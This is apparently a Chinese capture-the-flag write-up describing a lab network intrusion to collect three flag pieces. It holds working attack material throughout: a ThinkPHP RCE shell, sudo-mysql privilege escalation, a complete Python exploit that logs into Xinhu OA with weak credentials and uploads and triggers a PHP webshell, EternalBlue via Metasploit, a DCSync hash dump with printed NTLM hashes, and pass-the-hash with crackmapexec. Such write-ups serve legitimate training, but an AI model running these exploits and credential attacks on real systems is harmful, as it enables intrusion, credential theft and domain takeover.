从最简单的开始打吧
http://39.98.109.249/

sudo提权

fscan -h 39.98.109.249

扫到Thinkphp5.0.23RCE漏洞
直接进行GETSHELL


使用哥斯拉连接

/var/www/html >sudo -l

Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
/var/www/html >

因为数据库root用户可以无密码登录直接进行sudo的mysql提权执行命令

sudo mysql -e '\! find / -name flag*'

成功搜索到flag01.txt
cat一下


获取第一部分的flag

flag01: flag{60b53231-

信呼2.2.8 GETSHELL

先挂上代理,这里不过多赘述
弱口令admin;admin123

先进性fscan扫描

./fscan -h 172.22.1.0/24
cat result.txt

172.22.1.2   域控制器
172.22.1.21  win7  MS17-010 漏洞
172.22.1.18  信呼OA

编辑一下kali的配置

vim /etc/proxychains4.conf

然后挂上代理直接运行EXP
在同目录下要写一个shell.php

import requests

session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1741491341281',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('shell.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

原理:https://www.freebuf.com/articles/web/286380.html
sudo proxychains4 python3 exp.py

http://172.22.1.18/upload/2025-03/09_14374983.php

找到flag02.txt了

flag02: 2ce3-4813-87d4-

永恒之蓝+DCsync攻击

proxychains4 msfconsole

use exploit/windows/smb/ms17_010_eternalblue
#之前在fscan里面扫到过

show payloads
# 查看所有payloads

set payload windows/x64/meterpreter/bind_tcp_uuid
# 使用 bind_tcp 方式 在目标机器上 开启监听端口(需要主动连接)。
# 使用 UUID 进行唯一标识,帮助攻击者管理多个会话。

set RHOSTS 172.22.1.21
# 设置目标IP

exploit
# 攻击!
# 这里需要多打几次

上面这一步进行完成我们就可以成功拿到21段的权限
正常做法后续是抓取用户hash

load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   917087466c128d682068f0cb49a2fead        532480
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1104    XIAORANG-OA01$  d6126a9afe046d71d212186835ea1dee        4096
1108    XIAORANG-WIN7$  aa3cf7cdad268b94c110009e13180a55        4096


然后利用smb哈希传递

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

就可以获取flag03了

flag03: e8f88d0d43d6}

所以flag为:

flag01: flag{60b53231-
flag02: 2ce3-4813-87d4-
flag03: e8f88d0d43d6}